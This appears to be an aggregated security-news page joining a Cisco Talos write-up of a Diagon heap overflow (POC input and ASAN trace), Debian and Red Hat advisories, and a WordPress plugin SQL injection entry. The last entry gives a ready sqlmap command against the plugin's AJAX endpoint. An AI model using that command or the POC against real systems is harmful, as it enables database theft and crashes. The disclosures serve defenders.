      $19 = std::vector of length 1, capacity 1 = {{
          [...]
          left = 0xfb0,
          center = 0xfb1,
          right = 0xfb3
        }}
    

The left is 1 value from center, which is 2 value away from right. This is due to the calculation made at [3]. The space between left and right should take into consideration the length of the message, but because of the bug just explained it was not possible to account for that. This can lead to a heap buffer overflow vulnerability at [4] writing the message out-of-bounds.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A->A:POC_BOF
    

If we run Diagon compilation with ASAN with the POC:

    $ diagon Sequence < POC.md
    
    Something went wrong!
    =================================================================
    ==256826==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x628000017fd0 at pc 0x000000c77eab bp 0x7fff5f481050 sp 0x7fff5f481048
    WRITE of size 4 at 0x628000017fd0 thread T0
        #0 0xc77eaa in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >) /home/vagrant/Diagon/src/screen/Screen.cpp:32:20
        #1 0x8a1515 in Message::Draw(Screen&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:71:12
        #2 0x8aefb0 in Sequence::Draw[abi:cxx11]() /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:692:13
        #3 0x8acc37 in Sequence::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:293:10
        #4 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #5 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #6 0x7f1a7e31ad09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #7 0x44ca69 in _start (/home/vagrant/Diagon/build/diagon-1.0.139+0x44ca69)
    
    0x628000017fd0 is located 0 bytes to the right of 16080-byte region [0x628000014100,0x628000017fd0)
    allocated by thread T0 here:
        #0 0x4f677d in operator new(unsigned long) (/home/vagrant/Diagon/build/diagon-1.0.139+0x4f677d)
        #1 0x7f1a7e655a0e in void std::__cxx11::basic_string<wchar_t, std::char_traits<wchar_t>, std::allocator<wchar_t> >::_M_construct<wchar_t*>(wchar_t*, wchar_t*, std::forward_iterator_tag) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14ba0e)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/Diagon/src/screen/Screen.cpp:32:20 in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >)
    Shadow bytes around the buggy address:
      0x0c507fffafa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c507fffaff0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
      0x0c507fffb000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==256826==ABORTING
    

We can see that a heap buffer overflow occured at Sequence.cpp:71 that corresponds to the code at [4].

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-27390: TALOS-2023-1744 || Cisco Talos Intelligence Group

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

A vulnerability was found in quarkus-core. This vulnerability occurs because the TLS protocol configured with quarkus.http.ssl.protocols is not enforced, and the client can force the selection of the weaker supported TLS protocol.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-29

Updated:

2023-06-29

**RHSA-2023:3809 - Security Advisory**

*   Overview

**Synopsis**

Moderate: Red Hat build of Quarkus 2.13.8 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Quarkus. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.13.8 includes security updates, bug  
fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fixes:  

*   CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray \[quarkus-2\]
*   CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks \[quarkus-2\]
*   CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption \[quarkus-2\]
*   CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow \[quarkus-2\]
*   CVE-2023-0482 RESTEasy: creation of insecure temp files \[quarkus-2\]
*   CVE-2022-3782 keycloak: path traversal via double URL encoding \[quarkus-2\]
*   CVE-2023-0481 io.quarkus-quarkus-parent: quarkus: insecure permissions on temp files \[quarkus-2\]
*   CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider \[quarkus-2\]

For more information about the security issues, including the impact, a CVSS  
score, acknowledgments, and other related information, see the CVE links listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
*   BZ - 2163533 - CVE-2023-0481 quarkus: insecure permissions on temp files
*   BZ - 2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
*   BZ - 2174854 - CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks
*   BZ - 2180886 - CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow
*   BZ - 2181977 - CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption
*   BZ - 2182788 - CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray
*   BZ - 2211026 - CVE-2023-2974 quarkus-core: TLS protocol configured with quarkus.http.ssl.protocols is not enforced, client can enforce weaker supported TLS protocol
*   QUARKUS-2672 - Infinispan client is not aligned with newly released Red Hat Data Grid 8.4
*   QUARKUS-2787 - Rest Data Panache: Correct Open API integration
*   QUARKUS-2846 - Ensure that new line chars don't break Panache projection
*   QUARKUS-2978 - ExceptionMapper<WebApplicationException> is not working in DEV mode
*   QUARKUS-3158 - Do not create session and PKCE encryption keys if only bearer tokens are expected
*   QUARKUS-3159 - 2.13: Do not support any Origin by default if CORS is enabled
*   QUARKUS-3161 - Fix security-csrf-prevention.adoc
*   QUARKUS-3164 - Logging with Panache: fix LocalVariablesSorter usage
*   QUARKUS-3167 - Make SDKMAN releases minor for maintenance and preview releases
*   QUARKUS-3168 - Backport Ensure that ConfigBuilder classes work in native mode to 2.13
*   QUARKUS-3169 - New home for Narayana LRA coordinator Docker images
*   QUARKUS-3170 - Fix truststore REST Client config when password is not set
*   QUARKUS-3173 - Reinitialize sun.security.pkcs11.P11Util at runtime
*   QUARKUS-3174 - Prevent SSE writing from potentially causing accumulation of headers
*   QUARKUS-3175 - Filter out RESTEasy related warning in ProviderConfigInjectionWarningsTest
*   QUARKUS-3176 - Make sure parent modules are loaded into workspace before those that depend on them
*   QUARKUS-3177 - Fix copy paste error in qute docs
*   QUARKUS-3178 - Pass \`--userns=keep-id\` to podman only when in rootless mode
*   QUARKUS-3179 - Fix stuck HTTP2 request when sent challenge has resumed request
*   QUARKUS-3181 - Make sure quarkus:go-offline properly supports test scoped dependencies
*   QUARKUS-3184 - Use SchemaType.ARRAY instead of "ARRAY" for native support
*   QUARKUS-3185 - Simplify logic in create-app.adoc and allow to define stream
*   QUARKUS-3187 - Allow context propagation for OpenTelemetry
*   QUARKUS-3188 - Fix RestAssured URL handling and unexpected restarts in QuarkusProdModeTest
*   QUARKUS-3191 - Drop ':z' bind option when using MacOS and Podman
*   QUARKUS-3194 - Exclude Netty's reflection configuration files
*   QUARKUS-3195 - Integrate the api dependency from Infinispan 14 (#ISPN-14268)
*   QUARKUS-3205 - Missing JARs and other discrepancies related to xpp3 dependency in 2.13.8.

**CVEs**

*   CVE-2022-45787
*   CVE-2023-0481
*   CVE-2023-0482
*   CVE-2023-1436
*   CVE-2023-1584
*   CVE-2023-2974
*   CVE-2023-26053
*   CVE-2023-28867

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_quarkus/2.13/
*   https://access.redhat.com/articles/4966181

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-2974

WordPress WP AutoComplete Search plugin versions 1.0.4 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version: <= 1.0.4# CVE: CVE-2022-4297Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/# Tested on: Kali linux---------------------------------------The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,leading to an unauthenticated SQL injection--------------------------------------How to Reproduce this Vulnerability:1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests3. Find requests belong to WP AutoComplete like step 54. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

Tag

#linux